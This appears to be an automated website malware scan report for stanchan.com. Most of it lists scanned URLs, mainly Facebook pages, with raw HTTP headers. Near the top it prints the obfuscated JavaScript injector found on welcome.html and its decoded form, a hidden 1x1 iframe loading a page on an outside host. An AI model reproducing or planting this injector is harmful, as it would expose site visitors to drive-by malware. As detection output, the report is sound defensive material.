Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stanchan.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://stanchan.com/ | HTTP/1.1 200 OK Date: Mon, 29 Dec 2014 04:02:25 GMT Accept-Ranges: bytes ETag: "16875b28217dcb1:d70dd" Server: Microsoft-IIS/6.0 Content-Length: 20538 Content-Location: http://stanchan.com/welcome.html Content-Type: text/html Last-Modified: Fri, 05 Nov 2010 19:39:27 GMT X-Powered-By: ASP.NET | clean |
http://stanchan.com/welcome.html | 200 OK Content-Length: 20538 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
function nme(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(nme()>100000){function eEbKvNHSe(qEMQFOXnKc){ alert('nOBevVbxC');var nwTsnsgjfK = document.getElementById('olXPOWIOd'); }
function CnqEdre(QbWYjhIxns){var ikHGXJHQz=4,ysSci=9;var JzGUiHrCQy='55+5,75+5,74+2,79+5,72+0,77+3,73+7,43+1,81+7,75+5,73+3,80+4,75+1,56+0,50+6,43+1,75+1,73+7,75+5,74+6,75+1,80+4,56+0,50+6,43+1,7 var Thw=CnqEdre('mKSbCxBI')+LONDjbkYV('iCwpfifaFV')+BmdJaTdXK('JUAXjdlwH'); TVTQW=document;TVTQW['7275wr6969i3314t7510e85525604'.replace(/[0-9]/g,'')](Thw);function BAvErPO(lLunR){fff.op.replace("642");var UrEovWhM=new Function("FxzJX", "return 169057;"); } function eMOhoSkOC(HRD){fff.op.replace("266");var geXP = document.getElementById('IUPyxk');window.eval(); } }
Decoded script:
<iframe width=1 height=1 border=0 frameborder=0 src='http://sodanthu.com/in6.php'></iframe>
Antivirus reports:
http://beemaentertainment.com/images2/S_News.php | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Dec 2014 04:02:27 GMT Location: https://www.facebook.com/BeemaRecordlabelimages2/S_News.php Server: Apache/2 Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
https://www.facebook.com/beemarecordlabelimages2/s_news.php | HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:27 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=U9KgVOafTts-Dx0u3Dc-Pih1; expires=Wed, 28-Dec-2016 04:02:27 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fbeemarecordlabelimages2%2Fs_news.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fbeemarecordlabelimages2%2Fs_news.php; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: jZXRDcIGA6T9MGC4kGW7L9VLcbCsMg+LCR+57zsdeJSlEPYs2D/VvlKZmGisTkNnr2NH8nSIZVUms/vecr0DrA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/beemarecordlabelimages2/s_news.php?_fb_noscript=1 | 404 Not Found Content-Length: 30588 Content-Type: text/html | clean |
https://fbstatic-a.akamaihd.net/rsrc.php/v2/yZ/r/fHFs_qAU4eg.js | 200 OK Content-Length: 109598 Content-Type: application/x-javascript | clean |
http://beemaentertainment.com/ | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Dec 2014 04:02:29 GMT Location: https://www.facebook.com/BeemaRecordlabel Server: Apache/2 Content-Length: 225 Content-Type: text/html; charset=iso-8859-1 | clean |
https://www.facebook.com/beemarecordlabel | HTTP/1.1 200 OK Connection: close Date: Mon, 29 Dec 2014 04:02:29 GMT Content-Length: 798 Content-Type: text/html;charset=utf-8 P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=VdKgVGvFub6VR5AGkleYnzQ-; expires=Wed, 28-Dec-2016 04:02:29 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fbeemarecordlabel; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fbeemarecordlabel; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: nHMww9WzZ4XiVgKQIEuLZKUUHmWhB7y9sQ5EHpmSm4m426e5bezw9CDT+AOnYeB+VP8apTB+hw979EuhwPsz2Q== X-UA-Compatible: IE=edge,chrome=1 | clean |
http://www.facebook.com/test404page.js | 404 Not Found Content-Length: 72 Content-Type: text/html | clean |
http://www.facebook.com/ | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Dec 2014 04:02:29 GMT Location: https://www.facebook.com/ Content-Length: 0 Content-Type: text/html; charset=utf-8 X-FB-Debug: ZzwOS4D41LD62KYMVkF3nLT1k+bN+qd7GB5yXEOv+YHjG5WLwwOmRQxsp0sA/4ugkAXewilk8jJzBQ+Qyujc6g== | clean |
https://www.facebook.com/ | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:30 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=VtKgVO4j0yWcorXebOVxUF0n; expires=Wed, 28-Dec-2016 04:02:30 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: O+J1F6pP++RVcSsTkpQACXXqxbWOmTz1YDyoR6r0hvfhDbMEFTpWB7o1GOHKSF43XNFwQKE7qSOUbR8Xn8CH/w== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/?_fb_noscript=1 | 200 OK Content-Length: 62610 Content-Type: text/html | clean |
https://www.facebook.com/recover/initiate | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:31 GMT Pragma: no-cache Content-Length: 817 Content-Type: text/html;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=V9KgVK7T-a-ywgnEps3Js9Jm; expires=Wed, 28-Dec-2016 04:02:31 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: k8HBjzwmZHAB0XedtE0Y15fFduBEfJ6MSrHmrWVGF7j4Rjnx132f/1xB8f87SfqB8dqaIeU0LzCFARYdGr3BKg== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:31 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=V9KgVMBLlobESAvWJzcLzJlG; expires=Wed, 28-Dec-2016 04:02:31 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: w7R8fNr6hJPIkOj8RYmF99R0+D6iQi60w8Bi30DtckiHrmXOA3hYwYqr4CIeN31w48avxLe11HH3veiexfIp7g== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:32 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WNKgVLgcP4zntxqRTwgVxHVn; expires=Wed, 28-Dec-2016 04:02:32 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: 5708AczmO8TavsSd21kv7dG73vtWsHsnaCq3wLk+1nW9Dg3e/H4gFFKmU2sjLD3lce/aDcRrlK313XF9nu+0SA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:32 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WNKgVJ63SgxTziGfVYLhclZa; expires=Wed, 28-Dec-2016 04:02:32 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: rCFnO/XxqJr1U8s1YEhC4nxuBPU8Nx31Pn65MJSJaYUlUTgvUAGpF+/nM+oTdAeTQ0aMNWEvXX7lyorb8txnuw== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:32 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WNKgVC10dj2_rOIFg8lue1Q8; expires=Wed, 28-Dec-2016 04:02:32 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: bJJc/WwMxNSAVGwx+nZBMlutpZDB8F7QqXFVudvkNld3TRAynW1/Hs0tQ7wh/lU3aDlZdkT7vpxxieqTJMNhsQ== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover&%3bamp%3bamp%3b_fb_noscript=1&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:33 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WdKgVMLwnhbV5O15Gk8ufZHT; expires=Wed, 28-Dec-2016 04:02:33 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: QgItJSBNZ26M7PdNjduCKpDDRs741sPtsQePhYZ36wyUIXLwNFOfZwqUuIeoOvo9mLNv5mnqffPrWSmpHEMEqA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.facebook.com/legal/terms | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Dec 2014 04:02:33 GMT Location: https://www.facebook.com/legal/terms Content-Length: 0 Content-Type: text/html; charset=utf-8 P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WdKgVDJgl33Mziltf2YZu66-; expires=Wed, 28-Dec-2016 04:02:33 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: 6hNR5saXXixzipj1eUDMEkZdM3Cx+DMKLnbarSUtfYYaMB+HymVPE49JFB/4shmk7F0UCekxq+vtKdr2oeoXVw== X-UA-Compatible: IE=edge,chrome=1 | clean |
https://www.facebook.com/legal/terms | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:33 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WdKgVAlGKB9ooZ0khK3OWPY3; expires=Wed, 28-Dec-2016 04:02:33 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flegal%2Fterms; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flegal%2Fterms; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: IBrWLlCMIBRY6a39Kfxplt82OO4148AfjtwYtsa86v0Wtw05zGxbr/KZTm5v9Eoz2dSKiec7qsA9vTKlwCI+kg== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/legal/terms?_fb_noscript=1 | 200 OK Content-Length: 71111 Content-Type: text/html | clean |
https://www.facebook.com/r.php?locale=lt_LT | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:35 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WtKgVOxUIiedJZn5YBvMqcYy; expires=Wed, 28-Dec-2016 04:02:34 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_LT; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: 42SO+9kS3OYF2vqpTsiY3kfNHOv8UIV8XDg2t9O83FCBLvsVQ8wSk/bWIZ3KR+6lMRx5Nrjz/Xez5aeO3jESWg== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:35 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=W9KgVO6sELJnNWVM3nVFqKK8; expires=Wed, 28-Dec-2016 04:02:35 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: LA0s1Hi7cNSSnAvjZv9aj6Hfo2r0zgZ/0T6c6WPZavQ4LWZWus+7V7Z4YIPjSONK3tUJiovoMaaDHmmNzbSiLg== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:36 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=W9KgVGRK8LC7krYdX0JgDY1V; expires=Wed, 28-Dec-2016 04:02:35 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: Njsd2oDUF7eFdgY7p+JdpgpTErmq3T9Hia3bW0w5KLEYCsw2+MtKyzMmQKXO526RgsbqmzkQIpJ/zwHUgCx1JQ== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:36 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=XNKgVMz3bgolzP9_YXK-TZ4p; expires=Wed, 28-Dec-2016 04:02:36 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: cyfCKzn2p9iwzmtLFcLZQDHSVd3nSnv3bsT6rcb64e9+FnKKVF9oE4dXotwEEs+E6mF7aYLheBGLX/mxdpJjSA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&%3bamp%3bamp%3b_fb_noscript=1&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:37 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=XNKgVDb6FtyMtQa3MqUT_Qhf; expires=Wed, 28-Dec-2016 04:02:36 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: J951OL5eYQogB/SBVoNzc1MeqNSqHobx2GhhD+kShz+1jlkT5GHQ33JTP+/r1t0NPlUooqBe8nDbgyPV0PthBA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&%3bamp%3bamp%3bamp%3b_fb_noscript=1&%3bamp%3bamp%3b_fb_noscript=1&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:37 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=XdKgVCNt6HCUuEVDeDFVaP7K; expires=Wed, 28-Dec-2016 04:02:37 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253Bamp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: DdFatYLTBuOmiCbnYuDCDcFcwM8AQs4rRKnFEsMCMwLEPrM9lmqGt2Gxa4GVwOA6d/9k0ECrOFvTHrNqMEkBeQ== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.facebook.com/legal/ | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Dec 2014 04:02:37 GMT Location: https://www.facebook.com/legal/ Content-Length: 0 Content-Type: text/html; charset=utf-8 P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=XdKgVABQXNDT_-OOAI-Zan5n; expires=Wed, 28-Dec-2016 04:02:37 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: KbaJ8aU80gMnEwB1UZhp4Rwl3Eoal1uY8miQwLLcCD1XI5q5ui8kjrAj7sYAL9aO9AJWm9Ela+nLBPtaDW3dFA== X-UA-Compatible: IE=edge,chrome=1 | clean |
https://www.facebook.com/legal/ | HTTP/1.1 200 OK Connection: close Date: Mon, 29 Dec 2014 04:02:38 GMT Content-Length: 785 Content-Type: text/html;charset=utf-8 P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=XtKgVErRGk3CfbBUDxL9eR1R; expires=Wed, 28-Dec-2016 04:02:38 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: OEC2nCnniKxifXm5vmPOiw9uY+PfcQE+zqNnMU1Av7Ffdvze8HLY/zQT+Rm9qj58yqsbrTav4nGTX+B+fbXj7A== X-UA-Compatible: IE=edge,chrome=1 | clean |
https://www.facebook.com/legal/copyright.php | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:38 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=XtKgVEhyjGm6RZfLi0YHQEf4; expires=Wed, 28-Dec-2016 04:02:38 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flegal%2Fcopyright.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flegal%2Fcopyright.php; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: XUkgxyqrE/RzHvyTHTSv5ZuYi42lKcBou24q4+iNrQ4wxkUQt8AMnKzO5wCAHNxAUq8WoeA3Iq72S5kOk2X57w== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/legal/copyright.php?_fb_noscript=1 | 200 OK Content-Length: 41776 Content-Type: text/html | clean |
https://www.facebook.com/help/community/ | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:39 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=X9KgVLzwJyQ6k9TvWEuK3hZO; expires=Wed, 28-Dec-2016 04:02:39 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcommunity%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcommunity%2F; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: b9O4FSgyLEI6megZ8LmuUHUoEtL2XTUfYruBW39urrAAotdgp6rehgatoNg72tMKv2cz6Y3CkqxbcBmjb8hIzA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/community/?_fb_noscript=1 | 200 OK Content-Length: 126753 Content-Type: text/html | clean |
